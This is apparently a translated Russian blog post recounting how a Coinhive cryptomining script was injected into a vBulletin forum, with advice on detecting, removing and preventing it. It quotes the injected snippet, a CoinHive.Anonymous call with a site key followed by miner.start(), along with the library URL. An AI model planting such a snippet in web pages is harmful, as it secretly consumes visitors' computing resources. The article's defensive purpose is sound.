Что делать, если скрипт крипто-майнинга Coinhive заражает ваш сайт

Безопасность онлайн

Я читал о владельцах веб-сайтов, использующих на своих сайтах сценарии, которые используют ЦП компьютера посетителя при посещении его веб-сайта. Идея состоит в том, чтобы монетизировать свой контент – и поэтому вместо рекламы они используют скрипт, который запускается в браузере и использует ресурсы компьютера пользователя для майнинга криптовалюты. Но раньше я думал, что только владельцы веб-сайтов делают это по своему замыслу – я никогда не думал, что хакеры будут взламывать веб-сайты и распространять скрипт на другие веб-сайты и использовать ЦП своих посетителей, чтобы зарабатывать деньги для себя. Но это то, что сейчас происходит!

Сценарий крипто-майнинга Coinhive

Вчера, когда я посетил наш форум TWC, который работает на программном обеспечении vBulletin, мое программное обеспечение безопасности вывело это предупреждение:

https: // coinhive dot com /lib/coinhive.js Обнаружен объектный файл, загрузка заблокирована




Я обычно бываю на форуме каждый день и не видел его накануне. Поэтому я предполагаю, что это произошло когда-то ночью, в мое время, когда я спал.

Я использую программное обеспечение vBulletin для форума, и оно было обновлено до последней версии. Более того, для нас это было довольно неожиданным, поскольку домен TheWindowsClub.com использует веб-антивирус Sucuri и брандмауэр для защиты от сетевых веб-угроз и атак.

Программное обеспечение безопасности моего компьютера успешно остановило запуск вредоносного скрипта на моем компьютере с Windows 10. Я проверил с другими браузерами, такими как Chrome & Edge, и результаты были такими же.

После щелчка правой кнопкой мыши по веб-странице форума и проверки исходного кода я обнаружил, что это был вредоносный скрипт CryptoMiner CoinHive.

Это вредоносный Javascript Coinhive, который попал в мой код форума:

 var miner = new CoinHive.Anonymous ("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm"); miner.start (); 

Во всяком случае, первое, что я сделал, – это забрал форум и сообщил Сукури.

Люди из Sucuri очистили форум от сценария Coinhive, который был вставлен в мой форум за несколько часов, и все было в порядке.

Что такое CoinHive

Coinhive предлагает JavaScript-майнер для криптовалюты Monero, который вы можете встроить в свой веб-сайт и использовать ЦП компьютеров посетителей веб-сайта, чтобы добывать для вас монеты.

Это называется шифрование . Он включает в себя взлом пользовательских браузеров для майнинга криптовалюты. Некоторые владельцы веб-сайтов могут использовать их сами, чтобы заработать деньги, но в нашем случае это было введено.

Когда пользователь получает доступ к зараженному сайту, JavaScript Coinhive выполняется и добывает Monero, используя ресурсы ЦП пользователя. Это может привести к удушению процессора и неожиданному сбою системы компьютера жертвы.

Теперь, если ваш браузер заражен, вы увидите, как увеличивается использование ресурсов. Закройте браузер, и он упадет. Пользователь может заметить, что его машина нагревается, вентилятор работает быстро или батарея быстро разряжается.

Я попросил своего коллегу Саураба Мухекара посетить мой форум, используя его Mac , и посмотреть, что произошло. Что ж, его компьютер Mac тоже пострадал, когда он открыл форум с Safari! Он один из тех умных пользователей Mac OSX, которые используют антивирус для своего Mac. Его антивирус Avast для Mac успешно остановил запуск вредоносного скрипта.

Сказал Саурабх,

Вредоносное ПО CoinHive захватывает не только ПК с Windows, но и компьютеры Mac, так как это заражение Javascript через браузер. Хорошо, что я не верю в миф о том, что Mac не нуждается в антивирусном программном обеспечении, иначе мой компьютер был бы заражен, и мой Mac продолжал бы чеканить монеты для кого-то другого.

Предотвратите CoinHive от заражения вашего сайта

  1. Не используйте пустые шаблоны или плагины на своем веб-сайте/форуме.
  2. Обновите свою CMS до последней версии.
  3. Регулярно обновляйте программное обеспечение хостинга (PHP, база данных и т. Д.).
  4. Защитите свой веб-сайт с провайдерами веб-безопасности, такими как Sucuri, Cloudflare, Wordfence и т. Д.
  5. Принять основные меры предосторожности, чтобы защитить свой блог.

Удаление CoinHive майнера с сайта

Прежде всего, вы должны быть веб-мастером зараженного веб-сайта или иметь учетные данные администратора, которые предоставляют вам доступ ко всем файлам веб-сайта.

Теперь, когда ваш антивирус обнаружит заражение CoinHive, щелкните правой кнопкой мыши веб-страницу и выберите Просмотреть исходный код . Затем нажмите Ctrl + F и найдите «CoinHive».

После того, как вы определили местоположение вредоносного кода, вам нужно увидеть его местоположение – где он находится.Теперь вам нужно удалить его вручную. Чтобы сделать это, вам нужно немного знаний о кодировании вашей платформы. Вам нужно будет найти зараженный файл/файлы и вручную удалить из него вышеуказанный скрипт. Если вы не уверены в этом, попросите эксперта сделать это. Так как мы используем Sucuri, мы позволяем им сделать это.

Сделав это, очистите кеш вашего сервера и браузера. Если вы используете какой-либо плагин для кеша или, скажем, MaxCDN, тоже очистите эти кеши.

Защитите себя от криптовалютных скриптов

Криптовалюты и технологии Blockchain завоевывают мир. Это оказывает влияние на мировую экономику, а также вызывает технологические сбои. Все начали сосредотачиваться на таком прибыльном рынке – и это касается и хакеров веб-сайтов. По мере увеличения отдачи следует ожидать, что такие технологии будут использоваться не по назначению. Это темная сторона любой новой технологии.

Что мы можем сделать, так это принять все возможные меры предосторожности. Помимо использования хорошего программного обеспечения для обеспечения безопасности, используйте расширение Chrome или Firefox, которое блокирует веб-сайты от использования вашего ЦП для майнинга криптовалюты, или, что еще лучше, используйте Anti-WebMiner, который остановит атаки криптоджектинга Mining Script путем изменения файла Hosts. Работает во всех браузерах. Если вы пользователь Mac, пожалуйста, установите антивирусное программное обеспечение для вашего компьютера.

В качестве меры предосторожности, если вы когда-нибудь почувствуете, что могли посетить зараженный сайт, было бы неплохо очистить кэш браузера и проверить компьютер с помощью антивирусного программного обеспечения, а также AdwCleaner.

Оставайтесь в безопасности, будьте начеку!

Оцените статью
TechArks.Ru
Добавить комментарий